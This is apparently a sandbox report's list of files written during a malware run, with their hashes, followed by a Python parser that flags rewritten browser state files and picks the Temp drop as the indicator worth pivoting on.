C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 21f2f0bef275a57b30572684410cdf8f
SHA1 bece40526facf95a0d97b072bef6725baba559c5
SHA256 ad1c12d9ed5afe01afc9e0ae2be66767cff31db3bcd3efcbbb1ab42cc174aea6
SHA512 be1f6c61084342cb063d1c2e0e637210af2243d8ebb1e3ac6bf3119f8603edcfeee827b11c559c5ae9909d108dbe0475f3ee5d9e2d601d5d265981701c6b256e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 2e1ef0c9352d4f70995b1eff55811538
SHA1 7f5ed04bc7309e7f29637725fae11f903320d4cf
SHA256 9164984b22b46277bf4d3253ce3ee3a65ca6b33efb06265d0025a314848d0ec8
SHA512 0ce62c1c1953e692f826a28853343a2bafae71d1949aa8ba4260f63a06772e4823fb48d21c417bde7b7b4d2b4907b3d324d1f812446c1b0f30718d565b5ae9bd

C:\Users\Admin\AppData\Local\Temp\811856890180

MD5 0cde60dec65e1286ad373be1758926e1
SHA1 5b1b2f5d416c7c26fb4f071443d8920c1c78f66d
SHA256 6e4e6e9d375e9479e043536fc2a5ed2e9966715f68c4a07eea5d0102f5719956
SHA512 debedadc9e64242ae9e09350c8e5499425bab688c02e420a486a5589d1963787c99fd89f628836ef856a9924b505f2c13dfe88496949acde3f9504d888c3c3f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e1beebf44a6175026114e1d5d06f39c3
SHA1 a12477fc435fee0aee477ee935e094a41b7f4a2b
SHA256 316cfcb8ca011a5088101c6a239f8fb2d3e73845e5be4ddb50de5d2e6aacaba1
SHA512 a71cd68b9cb791785c4c91f87c3f4278b187112e901ad773519180743186e1a49c5c9cff3b4f0c82af2e9bb3a2b25942a696942497f0e38c8c71d2ce349dd764

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\2a3c4fde-3218-4265-bf82-244095dbb8e2\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 d86c2d0a960d9f095de6fdce80f9bda9
SHA1 c3c16b2afbef172b0891281f80677a3966681985
SHA256 ef6b646d0d834ba6396ce67b38e5927ac131d3a3376b9f1a4282a1e8799713c4
SHA512 9d73f96dd819f6e40aa185ffe5043cfdf87cc52437c8c2b1dd7a7bd457d53a7389478867945e8962c2e12f0410b24e82035a0b23c82342a35aef1710a1cf37b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe59adda.TMP

MD5 f7f40979d95cdfbed1680c25850c0307
SHA1 f01a9979e9d9c7f3b2f404c1e886080c2e59c08f
SHA256 afa49b3379fc87c71b8cfed5a808d9e0ee151f8cb1a55af9dec9799ee93af16a
SHA512 4d4103ba40f71827539ae1629748567f7856d399ea203ccb8588126a5d930789b4876ea1cc34c61a7c6bcac834622a536069a182a019cd5123926e3335ff3643

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c18e047dc132269d961b699657d49375
SHA1 b85f22ee76490e14d52d07ba850fb18a27e47b17
SHA256 dd89bb77751dc456bdeb0fefc6da782ee6f22a97ebc7fc7d59dd704dce5d424a
SHA512 ef40f6d8c51be68441653a77b7a1dee55c13dfaa1e33b064b35baf1ca51e2166ab22b3a4b402685575001cb4a2a6a905f4da99ad00faac8286fe9baac44b3df0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4c771030fdbcb5dbb9298c0836c26608
SHA1 bce9d23bc060869aa6a6a30b79510b48fc57fc1d
SHA256 18d0c47fa6c8e3155bfa6d0f5c5560d374d74be44a35bb5a77e91527681165aa
SHA512 c76ddf25bc7e7a879cffb84ebb3240cd93b50943e4648d8de77abf81da6f68db43c83226b82a6c147efc82b22957855efc87bed3df0627f0d820a85a1cc94bc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 37b9bc38b039d3acf2951cff7563fc62
SHA1 751ffa94405dd34c32a24b8df6d5e851a5371ad0
SHA256 c010f9f0267f24beee24b9f8ba64ea57a77a7f575e4311291896f1a855fcc62f
SHA512 2b626ea02c2367a135d326eeb5daf2639f014e1277eb1e727787612a8a18cfd04d999bf79319fec5fe8660a9c88a018827d14d13310b68227c3c707a0491a985
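The listing above is only useful to a responder once it is structured: which files were written more than once during detonation, and which hashes are actually worth pivoting on. The parser below is an added example, not code from the report or from the sandbox that produced it. It assumes the layout seen on this page (a path line, a blank line, then MD5, SHA1, SHA256 and SHA512 lines), validates each digest's hex length, and classifies paths with heuristics that are my own, not the sandbox's. The sample input is constructed from four of the entries above.

```python
"""Parse a sandbox "Files" listing into records, flag rewritten paths, pick IOCs.

Added example, not part of the report. Assumes the listing format on this
page: path line, blank line, "MD5 ", "SHA1 ", "SHA256 ", "SHA512 " lines.
The path-class rules in classify() are heuristics, not sandbox output.
"""
import re
from collections import defaultdict

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Constructed sample: four entries copied from the listing above.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 21f2f0bef275a57b30572684410cdf8f
SHA1 bece40526facf95a0d97b072bef6725baba559c5
SHA256 ad1c12d9ed5afe01afc9e0ae2be66767cff31db3bcd3efcbbb1ab42cc174aea6
SHA512 be1f6c61084342cb063d1c2e0e637210af2243d8ebb1e3ac6bf3119f8603edcfeee827b11c559c5ae9909d108dbe0475f3ee5d9e2d601d5d265981701c6b256e

C:\Users\Admin\AppData\Local\Temp\811856890180

MD5 0cde60dec65e1286ad373be1758926e1
SHA1 5b1b2f5d416c7c26fb4f071443d8920c1c78f66d
SHA256 6e4e6e9d375e9479e043536fc2a5ed2e9966715f68c4a07eea5d0102f5719956
SHA512 debedadc9e64242ae9e09350c8e5499425bab688c02e420a486a5589d1963787c99fd89f628836ef856a9924b505f2c13dfe88496949acde3f9504d888c3c3f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e1beebf44a6175026114e1d5d06f39c3
SHA1 a12477fc435fee0aee477ee935e094a41b7f4a2b
SHA256 316cfcb8ca011a5088101c6a239f8fb2d3e73845e5be4ddb50de5d2e6aacaba1
SHA512 a71cd68b9cb791785c4c91f87c3f4278b187112e901ad773519180743186e1a49c5c9cff3b4f0c82af2e9bb3a2b25942a696942497f0e38c8c71d2ce349dd764

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 37b9bc38b039d3acf2951cff7563fc62
SHA1 751ffa94405dd34c32a24b8df6d5e851a5371ad0
SHA256 c010f9f0267f24beee24b9f8ba64ea57a77a7f575e4311291896f1a855fcc62f
SHA512 2b626ea02c2367a135d326eeb5daf2639f014e1277eb1e727787612a8a18cfd04d999bf79319fec5fe8660a9c88a018827d14d13310b68227c3c707a0491a985
"""


def parse_listing(text):
    """Return one dict per entry ({"path", "MD5", "SHA1", "SHA256", "SHA512"}).

    Any non-empty line that is not a hash line starts a new entry. Digests are
    lower-cased and checked against the expected hex length for the algorithm.
    """
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash line before any path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HEX_LEN[algo]:
                raise ValueError(f"{algo} for {current['path']} has {len(digest)} hex chars")
            current[algo] = digest
        else:
            current = {"path": line}
            records.append(current)
    for r in records:
        missing = [a for a in HEX_LEN if a not in r]
        if missing:
            raise ValueError(f"{r['path']} is missing {missing}")
    return records


# Heuristic path classes (assumption for this example, not sandbox output).
BROWSER_PROFILE = re.compile(r"\\(Microsoft\\Edge|Google\\Chrome)\\User Data\\", re.I)
TEMP_DROP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def classify(path):
    """Browser state files are rewritten by the browser itself; Temp drops are not."""
    if BROWSER_PROFILE.search(path):
        return "browser-profile"
    if TEMP_DROP.search(path):
        return "temp-drop"
    return "other"


def rewritten_paths(records):
    """Paths listed more than once with different content, i.e. written repeatedly."""
    versions = defaultdict(list)
    for r in records:
        if r["SHA256"] not in versions[r["path"]]:
            versions[r["path"]].append(r["SHA256"])
    return {p: hs for p, hs in versions.items() if len(hs) > 1}


def candidate_iocs(records):
    """SHA256 values worth pivoting on: everything except browser-profile state files."""
    return sorted({r["SHA256"] for r in records if classify(r["path"]) != "browser-profile"})


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for path, hashes in rewritten_paths(recs).items():
        print(f"{len(hashes)} versions: {path}")
    print("candidate IOCs:", candidate_iocs(recs))
```

A path that appears several times with different hashes (TransportSecurity above) was written more than once during the run. TransportSecurity, Network Persistent State and Preferences are Chromium profile state files that Edge rewrites on its own, so their hashes identify a moment in a browser session rather than anything the sample authored; putting them in a blocklist only generates noise. The AppData\Local\Temp entry is the one to pivot on.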